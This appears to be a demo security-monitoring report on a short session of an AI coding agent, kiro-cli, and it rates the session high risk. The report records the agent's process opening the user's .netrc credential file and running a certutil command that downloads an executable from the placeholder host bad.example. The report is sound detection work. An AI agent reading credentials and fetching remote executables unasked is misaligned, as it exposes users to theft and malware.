- Session ID
ml-workstation-high-119895444- Agent
- kiro-cli
- Host
ml-workstation- First seen
2026-04-22 20:14:54Z- Last seen
2026-04-22 20:16:08Z- Duration
- 1m14s
- Events captured
- 31
- Posted at
2026-04-22 22:14:21Z- Report generated
2026-04-23 10:28:07Z- Report ID
cd9226beaafdc1dd- Schema version
- 1
- Live dashboard
- https://demo.sigtrace.ai/ui/sessions/ml-workstation-high-119895444
Verdict
High
2 sensitive paths
1 suspicious cmdline
1 shell spawn
3 network targets
Sensitive path hits · 2
| Path | Reason | Op | Process | Pid | When |
|---|
C:\Users\bill\.netrc |
netrc |
open |
|
7102 |
2026-04-22T20:16:04.570129063Z |
C:\Users\bill\.netrc |
netrc |
open |
|
7102 |
2026-04-22T20:16:04.570129063Z |
Suspicious host queries · 0
No suspicious host queries.
Suspicious command lines · 1
| Cmdline | Reason | Process | Pid | When |
|---|
certutil.exe -urlcache -split -f http://bad.example/x.exe C:\Temp\x.exe
|
certutil download |
C:\Windows\System32\wsl.exe |
4466 |
2026-04-22T20:16:08.570129063Z |
Registry persistence · 0
No registry persistence writes.
Flagged image loads · 0
No flagged image loads.
Top processes · 3
| Image | Count |
|---|
C:\Program Files\Git\usr\bin\bash.exe | 1 |
C:\Program Files\Kiro-Cli\kiro-cli.exe | 1 |
C:\Windows\System32\wsl.exe | 1 |
Top file opens · 6
| Path | Count |
|---|
C:\work\webapp\src\App.tsx | 4 |
C:\work\webapp\vite.config.ts | 4 |
C:\work\webapp\package.json | 3 |
C:\work\webapp\src\lib\api.ts | 3 |
C:\Users\bill\.netrc | 2 |
C:\work\webapp\src\components\Dashboard.tsx | 2 |
File writes · 4
| Path | Count |
|---|
C:\work\webapp\src\App.tsx | 1 |
C:\work\webapp\src\components\Dashboard.tsx | 1 |
C:\work\webapp\src\lib\api.ts | 1 |
C:\work\webapp\vite.config.ts | 1 |
File renames / deletes
No renames or deletes.
DNS queries · 3
| Query | Count |
|---|
cdn.jsdelivr.net | 1 |
proxy.golang.org | 1 |
pypi.org | 1 |
TCP targets · 3
| Target | Count |
|---|
104.16.132.229:443 | 1 |
140.82.114.3:443 | 1 |
34.107.221.82:443 | 1 |